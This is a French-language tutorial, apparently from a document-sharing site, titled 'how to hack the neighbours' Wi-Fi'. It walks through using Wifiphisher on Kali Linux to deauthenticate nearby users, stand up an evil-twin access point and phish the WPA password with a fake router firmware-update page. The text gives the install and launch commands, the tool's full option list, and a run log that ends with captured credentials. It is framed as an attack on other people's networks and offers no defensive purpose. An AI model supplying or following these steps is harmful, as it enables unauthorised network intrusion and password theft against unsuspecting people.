Вы находитесь на странице: 1из 8

Comment

hacker le wifi
des voisins
Alors que le craquage de mots de passe attirent beaucoup d'attention, les attaques par ingénierie sociale sont de loin le
moyen le plus rapide d'obtenir un mot de passe Wi-Fi. L'une des plus puissantes attaques d'ingénierie sociale Wi-Fi est
le Wifiphisher, un outil qui bloque l'accès internet jusqu'à ce que des utilisateurs désespérés entrent le mot de passe Wi-
Fi pour permettre la mise à jour du micrologiciel d'un faux routeur.

Les attaques d'ingénierie sociale sont puissantes car elles contournent souvent complètement la sécurité. Si vous pouvez
tromper un employé en lui faisant entrer un mot de passe sur une fausse page de connexion, la force du mot de passe n'a
pas d'importance.

Ne pas connaître la force du mot de passe que vous attaquez peut être frustrant, car investir le temps et la puissance de
traitement nécessaires à un dictionnaire ou à une attaque par la force brute peut sembler être un énorme gaspillage de
ressources. Au lieu de cela, des outils comme Wifiphisher posent des questions sur les personnes qui se cachent derrière
ces réseaux.

L'utilisateur moyen sait-il à quoi ressemble la page de connexion de son routeur Wi-Fi ? Le remarquerait-il s'il était dif-
férent ? Plus important encore, un utilisateur occupé, coupé d'Internet et stressé par la perturbation, pourrait-il toujours
entrer son mot de passe pour permettre une fausse mise à jour même s'il remarquait que la page de connexion était un
peu différente ?

Wifiphisher pense que la réponse est "oui". L'outil peut sélectionner n'importe quel réseau Wi-Fi à proximité, désau-
thentifier tous les utilisateurs (le brouiller) et créer un point d'accès cloné qui ne nécessite pas de mot de passe pour y
accéder. Tout utilisateur qui se connecte à ce réseau ouvert, semblable à un jumeau maléfique, reçoit une page de phish-
ing convaincante qui demande le mot de passe Wi-Fi pour permettre une mise à jour du micrologiciel, ce qui est expli-
qué comme la raison pour laquelle le Wi-Fi a cessé de fonctionner.

La mise à jour du microprogramme (firmware)


Pour la cible d'une attaque d'ingénierie sociale, les premiers signes de Wifiphisher ressemblent à un problème avec le
routeur. Tout d'abord, le Wi-Fi se coupe. Ils peuvent toujours voir le réseau, mais toute tentative de connexion échoue
immédiatement. D'autres appareils sont également incapables de se connecter au réseau, et ils commencent à remarquer
que non seulement un appareil, mais tous les appareils Wi-Fi, ont perdu la connexion au réseau.

C'est alors qu'ils remarquent un nouveau réseau, portant le même nom que l'ancien, mais ne nécessitant pas de mot de
passe. Après quelques tentatives supplémentaires pour rejoindre le réseau protégé, ils rejoignent le réseau ouvert par
crainte que leur routeur ne diffuse soudainement un réseau sans mot de passe auquel n'importe qui peut y accéder. Dès
qu'ils rejoignent le réseau, une page web officielle mentionnant le fabricant de leur routeur s'ouvre et les informe que le
routeur est en train de subir une mise à jour critique de son micrologiciel. Tant qu'ils n'auront pas entré le mot de passe
pour appliquer la mise à jour, l'internet ne fonctionnera pas.

Après avoir saisi le mot de passe Wi-Fi super sécurisé, un écran de chargement commence à s'afficher au redémarrage
du routeur, et ils se sentent un peu fiers d'avoir pris la sécurité de leur routeur au sérieux en installant cette mise à jour
critique. Après une minute d'attente, leurs appareils se reconnectent au réseau, désormais plus sûr grâce à la mise à jour
installée.

Un accès facile
Pour un hacker, obtenir les mots de passe est aussi simple que de sélectionner le réseau que vous souhaitez cibler. Après
avoir désigné une cible, Wifiphisher brouille immédiatement tous les appareils connectés au réseau, maximisant ainsi
les chances qu'une personne connectée au réseau soit frustrée et applique la fausse mise à jour. Ensuite, les informations
réseau de la cible sont clonées et le faux réseau Wi-Fi est diffusé pour faire croire à la cible que son routeur fonctionne
dans un mode de mise à jour non spécifié.

Les appareils qui se connectent sont immédiatement enregistrés sur une liste, et la page de phishing est adaptée au fabri-
cant du routeur en lisant la première partie de l'adresse MAC du routeur. Après avoir piégé l'une des cibles connectées
au réseau visé pour qu'elle entre le mot de passe, Wifiphisher informe le pirate tout en temporisant. Après avoir envoyé
le mot de passe capturé, la cible est cruellement occupée avec un faux écran de chargement de mise à jour et un faux
minuteur de redémarrage pour gagner du temps au hacker afin qu'il puisse tester le mot de passe capturé.
Ce dont vous aurez besoin
Pour que cette attaque fonctionne, vous aurez besoin d'un adaptateur de réseau sans fil compatible avec Kali Linux.

Outre un bon adaptateur réseau sans fil, vous aurez besoin d'un ordinateur équipé de Kali Linux, que vous devrez
d'abord mettre à jour en exécutant
~# apt update
~# apt upgrade
Si vous ne le faites pas, vous aurez très probablement des problèmes lors du processus d'installation de Wifiphisher ci-
dessous.

Step 1 Installer Wifiphisher


~# apt install wifiphisher

Reading package lists... Done


Building dependency tree
Reading state information... Done
wifiphisher is already the newest version (1.4+git20191215-0kali1).
The following packages were automatically installed and are no longer required:
dh-python libdouble-conversion1 liblinear3
Use 'apt autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 1891 not upgraded.

Si vous voulez essayer de l'installer à partir du dépôt GitHub, vous pouvez le faire en clonant le dépôt et en suivant les
instructions sur la page GitHub, comme tel :
~# git clone https://github.com/wifiphisher/wifiphisher.git
~# cd wifiphisher
~# sudo python setup.py install

Cela devrait permettre d'installer Wifiphisher, que vous pouvez désormais lancer en tapant simplement le nom du pro-
gramme dans une fenêtre de terminal.
Step 2 Options Wifiphisher
Vous devriez pouvoir exécuter le script à tout moment en tapant simplement :

~# sudo wifiphisher

dans une fenêtre de terminal. Bien que Wifiphisher n'ait pas de page de manuel, vous pouvez voir dans sa page --help
qu'il possède une liste assez impressionnante d'options de configuration que vous pouvez modifier en ajoutant divers
options à la commande.

~# wifiphisher --help

usage: wifiphisher [-h] [-i INTERFACE] [-eI EXTENSIONSINTERFACE]


[-aI APINTERFACE] [-iI INTERNETINTERFACE]
[-iAM MAC_AP_INTERFACE] [-iEM MAC_EXTENSIONS_INTERFACE]
[-iNM] [-kN] [-nE] [-nD]
[-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...]] [-e ESSID]
[-dE DEAUTH_ESSID] [-p PHISHINGSCENARIO] [-pK PRESHAREDKEY]
[-hC HANDSHAKE_CAPTURE] [-qS] [-lC] [-lE LURE10_EXPLOIT]
[--logging] [-dK] [-lP LOGPATH] [-cP CREDENTIAL_LOG_PATH]
[--payload-path PAYLOAD_PATH] [-cM] [-wP]
[-wAI WPSPBC_ASSOC_INTERFACE] [-kB] [-fH]
[-pPD PHISHING_PAGES_DIRECTORY]
[--dnsmasq-conf DNSMASQ_CONF] [-pE PHISHING_ESSID]

optional arguments:
-h, --help show this help message and exit
-i INTERFACE, --interface INTERFACE
Manually choose an interface that supports both AP and
monitor modes for spawning the rogue AP as well as
mounting additional Wi-Fi attacks from Extensions
(i.e. deauth). Example: -i wlan1
-eI EXTENSIONSINTERFACE, --extensionsinterface EXTENSIONSINTERFACE
Manually choose an interface that supports monitor
mode for deauthenticating the victims. Example: -eI
wlan1
-aI APINTERFACE, --apinterface APINTERFACE
Manually choose an interface that supports AP mode for
spawning the rogue AP. Example: -aI wlan0
-iI INTERNETINTERFACE, --internetinterface INTERNETINTERFACE
Choose an interface that is connected on the
InternetExample: -iI ppp0
-iAM MAC_AP_INTERFACE, --mac-ap-interface MAC_AP_INTERFACE
Specify the MAC address of the AP interface
-iEM MAC_EXTENSIONS_INTERFACE, --mac-extensions-interface MAC_EXTENSIONS_IN-
TERFACE
Specify the MAC address of the extensions interface
-iNM, --no-mac-randomization
Do not change any MAC address
-kN, --keepnetworkmanager
Do not kill NetworkManager
-nE, --noextensions Do not load any extensions.
-nD, --nodeauth Skip the deauthentication phase.
-dC DEAUTH_CHANNELS [DEAUTH_CHANNELS ...], --deauth-channels DEAUTH_CHANNELS
[DEAUTH_CHANNELS ...]
Channels to deauth. Example: --deauth-channels 1,3,7
-e ESSID, --essid ESSID
Enter the ESSID of the rogue Access Point. This option
will skip Access Point selection phase. Example:
--essid 'Free WiFi'
-dE DEAUTH_ESSID, --deauth-essid DEAUTH_ESSID
Deauth all the BSSIDs in the WLAN with that ESSID.
-p PHISHINGSCENARIO, --phishingscenario PHISHINGSCENARIO
Choose the phishing scenario to run.This option will
skip the scenario selection phase. Example: -p
firmware_upgrade
-pK PRESHAREDKEY, --presharedkey PRESHAREDKEY
Add WPA/WPA2 protection on the rogue Access Point.
Example: -pK s3cr3tp4ssw0rd
-hC HANDSHAKE_CAPTURE, --handshake-capture HANDSHAKE_CAPTURE
Capture of the WPA/WPA2 handshakes for verifying
passphraseExample : -hC capture.pcap
-qS, --quitonsuccess Stop the script after successfully retrieving one pair
of credentials
-lC, --lure10-capture
Capture the BSSIDs of the APs that are discovered
during AP selection phase. This option is part of
Lure10 attack.
-lE LURE10_EXPLOIT, --lure10-exploit LURE10_EXPLOIT
Fool the Windows Location Service of nearby Windows
users to believe it is within an area that was
previously captured with --lure10-capture. Part of the
Lure10 attack.
--logging Log activity to file
-dK, --disable-karma Disables KARMA attack
-lP LOGPATH, --logpath LOGPATH
Determine the full path of the logfile.
-cP CREDENTIAL_LOG_PATH, --credential-log-path CREDENTIAL_LOG_PATH
Determine the full path of the file that will store
any captured credentials
--payload-path PAYLOAD_PATH
Payload path for scenarios serving a payload
-cM, --channel-monitor
Monitor if target access point changes the channel.
-wP, --wps-pbc Monitor if the button on a WPS-PBC Registrar is
pressed.
-wAI WPSPBC_ASSOC_INTERFACE, --wpspbc-assoc-interface WPSPBC_ASSOC_INTERFACE
The WLAN interface used for associating to the WPS
AccessPoint.
-kB, --known-beacons Broadcast a number of beacon frames advertising
popular WLANs
-fH, --force-hostapd Force the usage of hostapd installed in the system
-pPD PHISHING_PAGES_DIRECTORY, --phishing-pages-directory PHISHING_PAGES_DI-
RECTORY
Search for phishing pages in this location
--dnsmasq-conf DNSMASQ_CONF
Determine the full path of a custom dnmasq.conf file
-pE PHISHING_ESSID, --phishing-essid PHISHING_ESSID
Determine the ESSID you want to use for the phishing
page
Step 3 Brancher votre adaptateur WIFI

Step 4 Lancer le script


Je vais utiliser mon adaptateur réseau sans fil USB, donc je vais ajouter l’option -i à la commande et ajouter le nom de
mon adaptateur réseau. Si je ne le fais pas, Wifiphisher va juste prendre l'adaptateur réseau qu'il peut.

Pour lancer le script, je vais exécuter la commande suivante.

~# wifiphisher -i wlan1

Ensuite, nous devrions voir une page montrant tous les réseaux voisins. Nous pouvons sélectionner le réseau que nous
voulons attaquer ici, et appuyer sur la touche Entrée.

Options: [Esc] Quit [Up Arrow] Move Up [Down Arrow] Move Down

ESSID BSSID CH PWR ENCR CLIENTS VENDOR


_________________________________________________________________________________________
│ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ 100% OPEN 0 Unknown │
│ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ 100% WPA2 2 Belkin International │
│ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ 100% OPEN 0 Unknown │

Ensuite, le script vous demandera quelle attaque vous voulez lancer. Sélectionnez l'option 2.

Options: [Esc] Quit [Up Arrow] Move Up [Down Arrow] Move Down

Available Phishing Scenarios:

1 - Network Manager Connect


Imitates the behavior of the network manager. This template shows Chro-
me's "Connection "Failed" page and displays a network manager window through the
page asking for the pre-shared key. Currently, the network managers of Windows
and MAC OS are supported.

2 - Firmware Upgrade Page


A router configuration page without logos or brands asking for WPA/WPA2
password due to a firmware upgrade. Mobile-friendly.

3 - OAuth Login Page


A free Wi-Fi Service asking for Facebook credentials to authenticate us-
ing OAuth

4 - Browser Plugin Update


A generic browser plugin update page that can be used to serve payloads
to the victims.

Après avoir sélectionné l'attaque, elle sera immédiatement lancée. Une page s'ouvrira pour surveiller les cibles qui re-
joignent le réseau. Wifiphisher écoutera également les appareils qui tentent de se connecter à des réseaux qui ne sont
pas présents, et il créera des versions factices pour attirer ces appareils à se connecter.

Extensions feed: │ Wifiphisher 1.4GIT


DEAUTH/DISAS - █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ │ ESSID:
DEAUTH/DISAS - █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ │ Channel: 11
│ AP interface: wlan1
│ Options: [ESC] Quit
│_________________________
Connected Victims:

HTTPS requests:
Après la connexion d'une cible, un pop-up lui demandera d'entrer le mot de passe.

Lorsque la cible entre le mot de passe, nous sommes avertis dans l'écran du Wifiphisher.

Extensions feed:
DEAUTH/DISAS - █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █
DEAUTH/DISAS - █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █
DEAUTH/DISAS - █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █
Victim █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ probed for WLAN with ESSID: 'FakeNed' (KARMA)
Victim █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ probed for WLAN with ESSID: 'Harmond Fernandez' (Evil
Twin)

Connected Victims:
█ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ 10.0.0.13 Apple iOS/MacOS
█ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ █ 10.0.0.29 Murata Manufacturing

HTTPS requests:
[*] GET request from 10.0.0.13 for http://captive.apple.com/hotspot-detect.html
[*] GET request from 10.0.0.13 for http://captive.apple.com/hotspot-detect.html
[*] GET request from 10.0.0.13 for http://captive.apple.com/hotspot-detect.html
[*] POST request from 10.0.0.13 with wfphshr-wpa-password=myfatpassword
[*] GET request from 10.0.0.13 for http://captive.apple.com/hotspot-detect.html
C'est tout ! Le scénario se termine et vous présente le mot de passe que vous venez de saisir.

[*] Starting Wifiphisher 1.4GIT ( https://wifiphisher.org ) at 2020-02-04 08:10


[+] Timezone detected. Setting channel range to 1-13
[+] Selecting wfphshr-wlan0 interface for the deauthentication attack
[+] Selecting wlan1 interface for creating the rogue Access Point
[+] Changing wlan1 MAC addr (BSSID) to 00:00:00:31:8c:e5
[!] The MAC address could not be set. (Tried 00:00:00:ee:5c:95)
[+] Sending SIGKILL to wpa_supplicant
[+] Sending SIGKILL to dhclient
[+] Sending SIGKILL to dhclient
[+] Sending SIGKILL to NetworkManager
[*] Cleared leases, started DHCP, set up iptables
[+] Selecting Firmware Upgrade Page template
[*] Starting the fake access point...
[*] Starting HTTP/HTTPS server at ports 8080, 443
[+] Show your support!
[+] Follow us: https://twitter.com/wifiphisher
[+] Like us: https://www.facebook.com/Wifiphisher
[+] Captured credentials:
wfphshr-wpa-password=myfatpassword
[!] Closing

Оценить